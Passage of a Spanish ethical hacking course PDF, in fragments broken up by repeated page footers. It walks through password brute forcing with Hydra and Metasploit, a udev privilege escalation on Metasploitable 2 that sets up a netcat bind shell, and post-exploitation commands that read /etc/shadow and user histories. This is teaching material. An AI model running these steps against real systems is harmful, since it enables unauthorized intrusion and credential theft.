SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY,
Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC y XMPP.
kali@kali:~$ hydra -h
La opción “-e nsr” intentará una contraseña nula “n”, el mismo login como contraseña “s”, y el login
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 90
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
https://www.mysql.com/
MySQL es un software el cual entrega un servidor para bases de datos SQL (Structured
QueryLanguafg), rápido, multi-tarea, multi-usuario, y robusto. El servidor MySQL está diseñado para
sistemas de producción de misión crítica y de carga crítica, como también para la integración en
software desplegado en masa.
Para los siguientes ejemplos se utilizará el módulo auxiliar de nombre “MySQL Login Utility” en
Metasploit Framework, el cual permite realizar consultas sencillas hacia la instancia MySQL por
usuarios y contraseñas específicos (Por defecto es el usuario root con la contraseña en blanco).
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 91
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
betterdefaultpasslist.txt”, para del proyecto SecLists. Este archivo debe ser editado para eliminar los
dos puntos y reemplazarlo con un espacio.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 92
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
d698bb4600c9dee4da5cc08ac08449067f08b7c0f70a9e81082e75dd0a048c4a
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 93
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
PostgreSQL es un poderoso sistema para bases de datos objeto-relacional de fuente abierta, con
más de 30 años de desarrollo activo, lo cual le ha valido una reputación de fiabilidad y características
de robustez y desempeño.
Para el siguiente ejemplo se utilizará el módulo auxiliar de nombre “PostgreSQL Login Utility” en
Metasploit Framework, el cual intentará autenticarse contra una instancia PostgreSQL utilizando
combinaciones de usuarios y contraseñas indicados por las opciones USER_FILE, PASS_FILE y
USERPASS_FILE.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 94
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 95
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 96
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Apache Tomcat es una implementación open source de Java Servlet, páginas JavaServer, Lenguaje
de Expresión Java y tecnologías WebSocket. El software Apache Tomcat potencia numerosas
aplicaciones web de misión críticas de gran escala, en una amplia diversidad de industrias y
organizaciones.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 97
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 98
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 99
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 100
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 101
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Abrir con el software de virtualización las máquina virtuales de Kali Linux y Metsploitable 2
Escaneo de Puertos
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 102
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Escaneo de Versiones
Enumeración de Usuarios
Proceder a enumerar usuarios válidos en el sistema utilizando el protocolo SMB con nmap
$ sudo ls -l escaneo*
Se filtran los resultados para obtener una lista de usuarios del sistema.
Cracking de Contraseñas
Utilizar THC-Hydra para obtener la contraseña de alguno de los nombre de usuario obtenidos.
Ganar Acceso
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 103
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Se procede a utilizar uno de los usuarios y contraseñas obtenidas para conectarse a Metasploitable2
uname -a
whoami; id
Sobre el Exploit:
Linux Kernel 2.6 UDEV < 141 Local Privilege Escalation Exploit
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
http://osvdb.org/show/osvdb/53810
udev anterior a 1.4.1 no verifica si un mensaje Netlink se origina desde el espacio del kernel, lo cual
permite a los usuarios locales ganar privilegios enviando un mensaje Netlink desde el espacio del
usuario.
Netlink es una familia de sockets utilizado para IPC. Fue diseñado para transferir información de red
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 104
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
variada entre el espacio del kernel de linux y el espacio de usuario. Por ejemplo opoute2 usa netlink
para comunciarse c on el kernel de linux desde el espacio de usuario.
$ cd /tmp/
$ less 8572.c
which nc
cc -o 8572 8572.c
nano /tmp/run
#!/bin/bash
nc -n -l -p 4000 -e /bin/bash
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 105
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
ps ax | grep udev
./8572 [PID-1]
id
Post Explotación.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 106
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
which bash
which curl
hich ftp
which nc
which nmap
which ssh
which telnet
which tftp
which wget
which sftp
ifconfig
arp
cat /etc/hosts
cat /etc/hosts.allow
cat /etc/hosts.deny
cat /etc/network/interfaces
netstat -an
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 107
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
dpkg -l
cat /etc/apt/sources.list
runlevel
ls /etc/rc2.d
df -h
cd /home
ls -oaF
cd /
ls -aRlF
ls -l /home
ls -la /home/msfadmin
ls -la /home/user
cat /home/user/.bash_history
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 108
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
ls -l /var/log
tail /var/log/lastlog
tail /var/log/messages
cat /etc/crontab
cat /etc/fstab
last
lastlog
ls -alG /root/.ssh
cat /root/.ssh/known_hosts
cat /etc/passwd
cat /etc/shadow
* Se podría también usar Jhon The Ripper para “romper” más contraseñas.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 109
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Ejecutar Wireshark
Escaneo de Versiones
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 110
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
$ cd /usr/share/exploitdb
Visualizar el archivo.
distcc es un programa para distribuir la construcción de código (C, C++,Objetive C Objetive C++)
entre varias máquinas de una red. Cuando no es configurado para restringir el acceso al puerto del
servidor, puede permitir a los atacante remotos ejecutar comandos arbitrarios mediante la compilación
de trabajos, los cuales son ejecutados por el servidor sin verificaciones de autorización.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 111
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
http://cvedetails.com/cve/2004-2687/
http://www.osvdb.org/13378
Explotación:
Una manera de escalar privilegios sería el encontrar la contraseña del usuario root o de un usuario
que tenga permisos para ejecutar comandos como root, mediante el comando “sudo”.Ahora podemos
intentar “crackear” la contraseñas de los usuarios del sistema con hydra .
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 112
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Una vez “crackeadas” algunas de las contraseñas, se procede a autenticarse con una de ellas desde
Kali Linux mediante el servicio ssh .
su root
id
FIN.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 113
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 114
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 115
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Más información:
https://www.reydes.com/d/?
q=Curso_de_Hacking_Etico
Más información:
https://www.reydes.com/d/?
q=Curso_de_Hacking_Aplicaciones_Web
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 116
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Más información:
https://www.reydes.com/d/?
q=Curso_de_Informatica_Forense
Más información:
https://www.reydes.com/d/?
q=Curso_de_Hacking_con_Kali_Linux
Más información:
https://www.reydes.com/d/?
q=Curso_de_OSINT
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 117
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Más información:
https://www.reydes.com/d/?
q=Curso_Forense_de_Redes
Curso de Nmap
Más información:
https://www.reydes.com/d/?
q=Curso_de_Nmap
Más información:
https://www.reydes.com/d/?
q=Curso_de_Metasploit_Framework
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 118
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Curso de Wireshark
Más información:
https://www.reydes.com/d/?
q=Curso_Wireshark
Más información:
https://www.reydes.com/d/?
q=Curso_OWASP_TOP_10
Curso de Maltego
Más información:
https://www.reydes.com/d/?q=Curso_Maltego
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 119
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Más información:
https://www.reydes.com/d/?
q=Curso_Forense_de_Autopsy
https://www.reydes.com/d/?
q=Curso_Fundamentos_de_Hacking_Etico
https://www.reydes.com/d/?
q=Curso_Fundamentos_de_Hacking_Web
https://www.reydes.com/d/?
q=Curso_Fundamentos_de_Forense_Digital
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 120
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
U2klMjBhZH U2UlMjBhcGxpY2
F1aWVyZSU ElMjB1biUyMGRlc
yMGRvcyUy 2N1ZW50byUyMG
MG8lMjBtJU RlbCUyMDE1JTI1
MzJUExcyUy LiUyMEVzY3JpYm
MGN1cnNvc ElMjBhJTIwcmV5Z
y4lMjA= GVzJTQwZ21haW
wuY29t
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 121